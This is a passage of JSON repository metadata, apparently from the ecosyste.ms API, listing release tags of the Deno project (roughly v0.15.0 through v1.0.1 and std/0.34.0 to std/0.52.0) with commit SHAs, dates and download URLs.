b.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v